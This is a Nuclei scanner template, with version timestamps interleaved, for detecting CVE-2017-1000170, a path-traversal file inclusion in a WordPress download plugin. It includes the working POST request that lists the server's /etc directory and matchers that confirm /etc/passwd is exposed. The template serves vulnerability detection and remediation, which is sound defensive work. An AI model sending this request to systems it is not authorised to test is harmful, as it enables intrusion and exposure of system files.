2021-03-23 12:56:42 +00:00
id : CVE-2017-1000170
info :
2022-06-09 20:35:21 +00:00
name : WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
2021-03-23 12:56:42 +00:00
author : dwisiswant0
severity : high
2022-06-09 20:35:21 +00:00
description : WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
2023-09-06 13:22:34 +00:00
remediation : |
Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49693
2022-05-17 09:18:12 +00:00
- https://github.com/jqueryfiletree/jqueryfiletree/issues/66
- http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000170
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-1000170
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.70305
2023-11-27 09:19:41 +00:00
epss-percentile : 0.97702
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jqueryfiletree_project
product : jqueryfiletree
tags : cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm
2021-03-23 12:56:42 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-23 12:56:42 +00:00
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
2023-07-11 19:49:27 +00:00
2021-03-23 12:56:42 +00:00
body : "dir=%2Fetc%2F&onlyFiles=true"
2023-07-11 19:49:27 +00:00
2021-03-23 12:56:42 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-03-23 12:56:42 +00:00
words :
- "<li class='file ext_passwd'>"
2021-03-23 12:56:56 +00:00
- "<a rel='/passwd'>passwd</a></li>"
2021-03-23 12:56:42 +00:00
condition : and
2023-07-11 19:49:27 +00:00
2021-03-23 12:56:42 +00:00
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2023-11-27 10:10:24 +00:00
# digest: 4b0a00483046022100ad2f3e58bc6b984c58fea36abd88d4fae7c0634f7a60048e7b71f6e1cd9c3b5d022100a41643359761ed9ff5d6313c784c3a8ad98e76e9dc982af1f752f9bb15439bc0:922c64590222798bb761d5b6d8e72950